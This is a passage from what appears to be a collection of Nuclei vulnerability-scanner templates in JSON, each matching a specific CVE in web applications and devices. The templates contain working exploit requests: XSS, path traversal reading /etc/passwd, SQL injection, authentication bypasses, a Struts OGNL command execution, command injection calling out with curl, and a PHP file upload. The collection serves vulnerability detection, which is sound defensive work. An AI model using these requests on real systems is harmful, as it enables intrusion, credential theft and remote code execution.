IP","((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3219","info":{"name":"EventON Lite < 2.1.2 - Arbitrary File Download","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6909","info":{"name":"Mlflow <2.9.2 - Path Traversal","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"artifact_location\": \"http:///?/../../../../../../../../../../../../../../etc/\"}\n","POST /api/2.0/mlflow/runs/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"experiment_id\": \"{{EXPERIMENT_ID}}\"}\n","POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\": \"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"run_id\": \"{{RUN_ID}}\", \"source\" : \"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header_5","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body_1","name":"EXPERIMENT_ID","group":1,"json":[".experiment_id"],"internal":true},{"type":"json","part":"body_2","name":"RUN_ID","group":1,"json":[".run.info.run_id"],"internal":true}]}]},{"id":"CVE-2023-49785","info":{"name":"ChatGPT-Next-Web - SSRF/XSS","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23","{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<script>alert(document.domain)</script>\")","contains(header_1, \"text/html\")"],"condition":"and"},{"type":"dsl","dsl":["contains(header_2,'X-Interactsh-Version')","contains(interactsh_protocol_2,'dns')"],"condition":"and"}]}]},{"id":"CVE-2023-5074","info":{"name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dview8/api/usersByLevel HTTP/1.1\nHost: {{Hostname}}\nAuthorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"userName\") && contains(body, \"passWord\") && contains(body, \"isEmailActivate\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-4974","info":{"name":"Academy LMS 6.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 500","contains(body, \"Courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-4116","info":{"name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Passengers\", \"Drop-off address\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-4169","info":{"name":"Ruijie RG-EW1200G Router - Password Reset","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/set_passwd"],"body":"{\n\"username\":\"web\",\n\"admin_new\":\"{{password}}\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1318","info":{"name":"osTicket < v1.16.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["scp/ajax.php/queue/condition/addProperty?prop=background-colorvximw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3edhvmt&condition=1001","scp/ajax.php/queue/condition/addProperty?prop=color&condition=1001ljos2%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Emui2bt(document.domain)%3C%2fscript%3Edhvmt","scp/ajax.php/queue/condition/add?field=isassigned&object_id=9&id=1001lr5is%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euoq07","scp/ajax.php/staff/change-departmenthpwc8%22%3e%3cscript%3ealert(document.domain)%3c/script%3em7dak","scp/ajax.php/kb/faq/1/accessmztvw%22%3e%3cscript%3ealert(document.domain)%3c/script%3ez2p1d"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(body, \"><script>alert(document.domain)</script>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-47211","info":{"name":"ManageEngine OpManager - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /two_factor_auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nj_username={{username}}&j_password={{password}}\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n","POST /client/api/json/mibbrowser/uploadMib HTTP/1.1\nHost: {{Hostname}}\nX-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}\nContent-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262\n\n-----------------------------372334936941313273904263503262\nContent-Disposition: form-data; name=\"mibFile\"; filename=\"karas.txt\"\nContent-Type: text/plain\n\n../images/karas DEFINITIONS ::= BEGIN\n\n\nIMPORTS\n    enterprises\n        FROM RFC1155-SMI;\n\nmicrosoft       OBJECT IDENTIFIER ::= { enterprises 311 }\nsoftware        OBJECT IDENTIFIER ::= { microsoft 1 }\nsystems         OBJECT IDENTIFIER ::= { software 1 }\nos              OBJECT IDENTIFIER ::= { systems 3 }\nwindowsNT       OBJECT IDENTIFIER ::= { os 1 }\nwindows         OBJECT IDENTIFIER ::= { os 2 }\nworkstation     OBJECT IDENTIFIER ::= { windowsNT 1 }\nserver          OBJECT IDENTIFIER ::= { windowsNT 2 }\ndc              OBJECT IDENTIFIER ::= { windowsNT 3 }\n\nEND\n\n-----------------------------372334936941313273904263503262--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")","contains(body, \"MIBFile with same name already exists\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"x_zcsrf_token","group":1,"part":"header","regex":["Set-Cookie: opmcsrfcookie=([^;]{50,})"],"internal":true}]}]},{"id":"CVE-2023-35160","info":{"name":"XWiki >= 2.5-milestone-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)","{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"javascript:alert(document.domain)\"","XWikiGuest"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-6018","info":{"name":"Mlflow - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"models:/{{model_name}}/1\"}\n","GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["\"registered_model\":","\"name\":"],"condition":"and"}]}]},{"id":"CVE-2023-6329","info":{"name":"Control iD iDSecure - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/login/unlockGetData HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["serial"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"serial","internal":true,"json":[".serial"]}]},{"raw":["POST /api/login/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"passwordCustom\": \"{{javascript_response}}\", \"passwordRandom\": \"{{passwordRandom}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["accessToken"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"access-token","internal":true,"json":[".accessToken"]}]},{"raw":["POST /api/operator/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{access-token}}\nContent-Type: application/json\n\n{\"idType\": \"1\", \"name\": \"{{username}}\", \"user\": \"{{username}}\", \"newPassword\": \"{{password}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/json\")","contains_all(body, \"code\", \"newID\")"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3844","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>r5c3m\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4148","info":{"name":"Ditty < 3.1.25 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(/XSS/)</script>\") && contains(body_2, \"ditty\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-47105","info":{"name":"Chaosblade < 1.7.4 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /chaosblade?cmd=$(id) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"uid=\", \"code\", \"success\\\":false\", \"error\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-49070","info":{"name":"Apache OFBiz < 18.12.10 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?>\n  <methodCall>\n    <methodName>{{randstr}}</methodName>\n    <params>\n      <param>\n      <value>\n        <struct>\n       <member>\n          <name>test</name>\n          <value>\n      <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}</serializable>\n          </value>\n        </member>\n      </struct>\n      </value>\n    </param>\n    </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<name>faultString</name>"]}]}]},{"id":"CVE-2023-45671","info":{"name":"Frigate < 0.13.0 Beta 3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Camera named <img src=\\\"\\\" onerror=alert(document.domain)>\")","contains(header, \"text/html\")","status_code == 404"],"condition":"and"}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28662","info":{"name":"Wordpress Gift Cards <= 4.3.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Gift Vouchers and Packages"]}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, 'critical error')"],"condition":"and"}]}]},{"id":"CVE-2023-42793","info":{"name":"JetBrains TeamCity < 2023.05.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<token name=\"RPC2\" creationTime"]},{"type":"word","part":"body_5","words":["StdOut:{{randstr}}"]}],"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3848","info":{"name":"MooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd\"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32077","info":{"name":"Netmaker - Hardcoded DNS Secret Key","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/dns"],"headers":{"Authorization":"x secretkey"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/json\")","contains_all(body, \"{\\\"address\\\":\", \"\\\"network\\\":\", \"\\\"name\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-22232","info":{"name":"Adobe Connect < 12.1.5 - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"],"matchers-condition":"and","matchers":[{"type":"word","words":["Save to My Computer","exam.pdf","Click to Download"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/pondol-formmail/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - 